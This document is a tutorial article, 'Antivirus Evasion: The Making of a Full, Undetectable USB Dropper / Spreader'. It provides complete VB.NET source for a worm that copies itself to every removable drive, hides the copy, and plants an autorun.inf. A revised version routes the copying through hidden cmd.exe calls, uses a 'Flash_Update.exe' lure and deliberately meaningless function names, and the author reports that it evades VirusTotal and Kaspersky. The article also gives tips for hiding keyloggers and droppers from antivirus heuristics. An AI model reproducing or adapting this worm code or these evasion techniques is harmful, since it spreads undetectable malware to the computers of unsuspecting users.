Antivirus Evasion: The Making of a Full, Undetectable USB Dropper / Spreader

Some Basics and Overview

Usually when we talk about bypassing antivirus software, and especially when we talk about antivirus programs like NOD32, Kaspersky, BitDefender… We automatically think about deep coding knowledge, using undocumented APIs or using Zero days exploits, but this is not always true, since by applying some “very” basics approaches we will be able to bypass most of (if not all) antivirus programs, at least for doing some basic things.

Basically, all antivirus programs detect malicious files the same way, either by checking for a digital signature inside of the files (which explains the importance of keeping your antivirus up to date) or by a technique called heuristic detection. This (and of course other criteria) usually makes the difference between a good and a bad antivirus.

Signature detection

Technically when an antivirus starts looking for a signature, it looks for “string(s)” found by Antivirus research labs and considered as a fingerprint that a malicious program code may have. Every single virus, worm, or any other malware has its own signature, and considering the fact that there are billions of malicious files in the world, and there are more and more malware developers, looking for a specific signature becomes almost impossible, so Antivirus labs and malware analysts start to give a kind of generic signature to help find a type of malicious program, and not the “one by one” way.

Even using generic signatures, this detection mode is still archaic due to the diversity of ways to protect malware from being detected. Complex packers, custom encryption or polymorphism make this way of detection not 100% reliable, especially when it comes to detecting totally new viruses or very complex ones.

Heuristic detection

Almost all recent antivirus software have a heuristic detection mode which consists (in a very simple way) to simulate a file execution, then monitoring if this file performs any suspicious activities like replication, file injection, file downloading or hiding files from the explorer. This is quite clever, but may lead to generate lot of false positive detections since heuristic analysis is a kind of multi-criteria analysis based in most cases on “already known” codes, classes, methods, functions or some commands that are not usually implemented in widely used programs. This may be considered as a kind of weakness that would, and will be, exploited (later in this article) to avoid detection by this way of analysis, since at this stage, bypassing heuristic analysis is bypassing the whole antivirus because every “fully” new coded malware is totally unknown by the antivirus and will not be detectable instantly via a digital signature.

The problem is not coding a harmful program; the real problem is spreading it out! As known, the aim of any malicious program coder is to infect or take the control of the largest number possible of computers, and this cannot be done manually, so almost every virus, worm, botnet, etc. has one or more ways to propagate implemented as functionality! And one of the most common modes used is self-spreading via removable disks like USB flash drives.

The idea is quite simple: the malware will check periodically for removable disks (USB keys, memory cards, and even some external hard drives). If found, it will copy itself (replication of the original malware) on it / them under an appealing name or under a random one, but hides itself from the explorer by changing the file attributes, and will create an Autorun.inf file which will run the replication mode every time this removable disk is plugged into a computer.

Our Main Goal

For every new generation of Antivirus software, this behavior will be flagged as suspicious or malicious behavior and will be detected in most of cases as Trojan horse Dropper.Generic, Trojan.Generic or something similar!

We will see how we can make a fully undetectable USB spreader, without any obfuscation or encryption, just by making the same thing the way Kaspersky’s heuristic analysis does not consider as “malicious behavior”.

I’ll use VirusTotal to analyze generated files (even if it’s not important since our program is not really harmful) and all upcoming tests are made under Windows 7 Ultimate with the trial version of Kaspersky Internet Security 11.0.2.556 installed.

All codes are in VB.NET using Frameworks 4, which is an uncommon language for coding malicious stuff, but it’s wise to say that some serious worms, viruses and remote administration tools were done using VB, VB.net or VBscript.
Anyway, let’s make a USB dropper “the normal way” and see how it’s seen by VirusTotal and Kaspersky’s heuristic analysis.

The Game

Let’s start by making a basic USB spreader. If you want to make tests, just create a new project under Microsoft Visual Studio, and make sure you import System.Threading and System.IO then copy and paste this code:

Imports System.Threading

Imports System.IO

Public
Class
Form1

Shared ReplicatedName As
String = “USBsetup.exe”

Private
Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles
MyBase.Load

StartUSBspreading()

End
Sub

Sub StartUSBspreading()

Try

Do

Dim Alldrives() As
DriveInfo = DriveInfo.GetDrives()

For
Each DriveFound As
DriveInfo
In Alldrives

If DriveFound.DriveType = “2”
And DriveFound.IsReady = True
Then

System.IO.File.Copy(Application.ExecutablePath, DriveFound.RootDirectory.ToString & ReplicatedName, True)

File.SetAttributes(DriveFound.RootDirectory.ToString & ReplicatedName, FileAttributes.Hidden)

AutorunMaker(DriveFound)

End
If

Next DriveFound

Thread.Sleep(6000)

Loop

Catch ex As
Exception

End
Try

End
Sub

Public
Shared
Sub AutorunMaker(ByVal driveFound As
DriveInfo)

Try

File.Delete(Convert.ToString(driveFound.RootDirectory) & “autorun.inf”)

Dim AutorunStreamWriter As
New
StreamWriter(Convert.ToString(driveFound.RootDirectory) & “autorun.inf”)

AutorunStreamWriter.WriteLine(“[autorun]”)

AutorunStreamWriter.WriteLine(“shellexecute=” & ReplicatedName)

AutorunStreamWriter.Flush()

AutorunStreamWriter.Close()

File.SetAttributes(Convert.ToString(driveFound.RootDirectory) & “autorun.inf”, FileAttributes.Hidden)

Catch ex As
Exception

End
Try

End
Sub

End
Class

Instead of using direct APIs like WM_DEVICECHANGE that get you notified about hardware device changes, and to avoid the use of controls like timers, usually malicious programs coders use infinite loops looking for removable disks, and that sleep for seconds, just like what happens in this case. On program load, StartUSBspreading() is called and it gets all detected drives, then it looks only for removable ones. If the drive found is ready, the program makes a replication of itself and an aurotun.inf file that will load the replicated file, and hides both of the newly made files.

VirusTotal did not return real useful information since it makes just a static analysis:

File name:    MyTestApp.exe

Detection ratio:     1 / 42

https://www.virustotal.com/file/497571ba2d8a51ae4a3f7ce3a9746fef3563bd18ed4cf126d4b1b34d4bcdcf9f/analysis/1346767444

With a detection ratio of 1/42 we may say that we have already an interesting achievement, but when running a heuristic analysis of Kaspersky it detects our program, which has no digital signature, as high risk program and neutralizes the threat.

Figure 1 Behavior similar to PDM.Trojan.generic detected

At this stage we can consider several changes on our code that may lead to decreased detection rate, like using classes and modules, but one of the most powerful – and easiest – techniques is renaming as many functions, subs and events used as possible. We said that heuristic analysis is based on already known stuff, and almost all malicious programs do the same things like damaging your computer, stealing personal data or spying on your activities … and most of these aims are reached using some common piece of codes, for example to make a keylogger, you will probably use APIs like SetWindowsHookEx and events like Hook_Keyboard(), and by changing subs and functions names to some common ones (like BooksManagers(), Baby, Chat_System(), etc.) malicious coders reach an unexpected detection ratio! Renaming already known functions and subs can actually decrease detection ratio very considerably.

Our sample is just a few lines of code, and renaming subs will not bypass Kaspersky. Let’s think about this a second, our objective is clear: making a replication of our program and an Autorun.inf file in any plugged removable disk.

Instead of using suspicious methods like File.Copy() and File.Delete(), we can possibly make Kaspersky and most antivirus programs believe that it’s the user who copied or deleted files by using another intermediary program that requires almost no privilege, which is Windows CMD command line (executable cmd.exe).

By invoking the Windows command silently, we can do everything that could be done via the command line without any restrictions!

We can make a thread that creates the autorun.inf file temporarily somewhere in the user’s system folder and another thread that checks for the presence of plugged removable disks and makes copy tasks via hidden instances of command line.

This may seems strange, but after some tests I made, using weird names for functions, procedures, and methods may also help decrease the detection ratio.

Here is the new code for our USB dropper:

Imports System.Threading

Imports System.IO

Public
Class
Form1

Dim MyPogramPath As
String = Application.ExecutablePath

Dim MyAutPath As
String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & “microsoftautorun.inf”

Dim mo As
New
Thread(AddressOf makdeotrn)

Dim k1 As
New
Thread(AddressOf kaynaChiKle)

Sub OnchorhaWalakal2ajr(ByVal d As
String)

Try

If
Not IO.File.Exists(d & “Flash_Update.exe”) Then

Dim Proc As
New
Process()

Proc.StartInfo.FileName = “cmd.exe”

Proc.StartInfo.Arguments = “/c copy “ & “””” & MyPogramPath & “””” & ” “ & “””” & d & “Flash_Update.exe”

Proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden

Proc.StartInfo.CreateNoWindow = False

Proc.Start()

Proc.WaitForExit()

Proc.Close()

FileSystem.SetAttr(d & “Flash_Update.exe”, FileAttribute.Hidden)

End
If

Catch ex As
Exception

End
Try

End
Sub

Sub OnchorhaWalakal2ajr2(ByVal d As
String)

Try

Dim Proc As
New
Process()

Proc.StartInfo.FileName = “cmd.exe”

Proc.StartInfo.Arguments = “/c copy “ & “””” & MyAutPath & “””” & ” “ & d

Proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden

Proc.StartInfo.CreateNoWindow = False

Proc.Start()

Proc.WaitForExit()

Proc.Close()

FileSystem.SetAttr(d & “autorun.inf”, FileAttribute.Hidden)

Catch ex As
Exception

End
Try

End
Sub

Sub kaynaChiKle()

a:

Dim kle() As
DriveInfo = DriveInfo.GetDrives()

For
Each found As
DriveInfo
In kle

If found.DriveType = “2”
And found.IsReady = True
Then

Try

OnchorhaWalakal2ajr2(found.RootDirectory.ToString)

OnchorhaWalakal2ajr(found.RootDirectory.ToString)

Catch ex As
Exception

End
Try

End
If

Next found

GoTo a

End
Sub

Public
Sub MakDeOtrn()

Try

Dim appdata As
String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & “microsoft”

Dim sw As
New
StreamWriter(appdata & “autorun.inf”)

Dim s As
String = appdata & “autorun.inf”

If IO.File.Exists(s) Then

Try

IO.File.Delete(s)

Catch ex1 As
Exception

End
Try

End
If

sw.WriteLine(“[autorun]”)

sw.WriteLine(“shellexecute=” + “Flash_Update.exe”)

sw.Flush()

sw.Close()

Catch ex As
Exception

End
Try

End
Sub

Private
Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles
MyBase.Load

mo.IsBackground = True

mo.Start()

k1.IsBackground = True

k1.Start()

End
Sub

End
Class

Some explanation for the code above:

1. MakDeOtrn() will make autorun.inf into “C:UsersUserNameAppDataRoamingmicrosoft” designed to run a file called “Flash_Update.exe“
   
2. OnchorhaWalakal2ajr (b) checks if the removable disk is not infected yet, if it’s true, we set the application that we want to start which is cmd.exe, we set the arguments that are in the command line which will copy the running program (our malicious program) to the removable disk found, under the name “Flash_Update.exe” and of course starts cmd.exe in a hidden window, and wait until the end of copying process to hide the replicated file from the explorer.
   
3. OnchorhaWalakal2ajr2 (b) does the same thing as #2 for “autorun.inf“
   
4. kaynaChiKle() will check infinitely for the presence of removable disks, if found it calls respectively procedures #3 and #2.
   

Before testing this new generated program, VirusTotal now considers it as a clean file with a detection ratio of 0/41 as you can see from this link. (www.virustotal.com/file/62254a2968b9a9385a9510431b8023fa2db50b572b6c5d76fdfea0234df8ea03/analysis/1346780514/)

Scanning our program with Kaspersky reveals absolutely nothing:

Figure 2 No threat has been detected

After starting it, our program spreads itself as seen here:

To Conclude…

We can make fully undetectable Download and Execute programs, even some silent Download and Install programs and some real silent adwares, and this with absolutely no deep coding knowledge, and the worst is that this simple technique seems to bypass all known antivirus (tested with 5 well known antivirus and further tests are to come), and we can make our spreader even more difficult to detect by encrypting or obfuscating it.

Complicated things like bypassing antivirus, especially those like Kaspersky, NOD32, BitDefender or AntiVir may not need to be done the complicated way, the example of this USB spreader may let us conclude that as smart as an antivirus and its analysis are, there is always a “simple” way to cheat it.

References

• www.msdn.microsoft.com/en-us/library/system.diagnostics.process
• http://www.symantec.com/connect/ja/articles/heuristic-techniques-av-solutions-overview
• http://en.wikipedia.org/wiki/Antivirus_software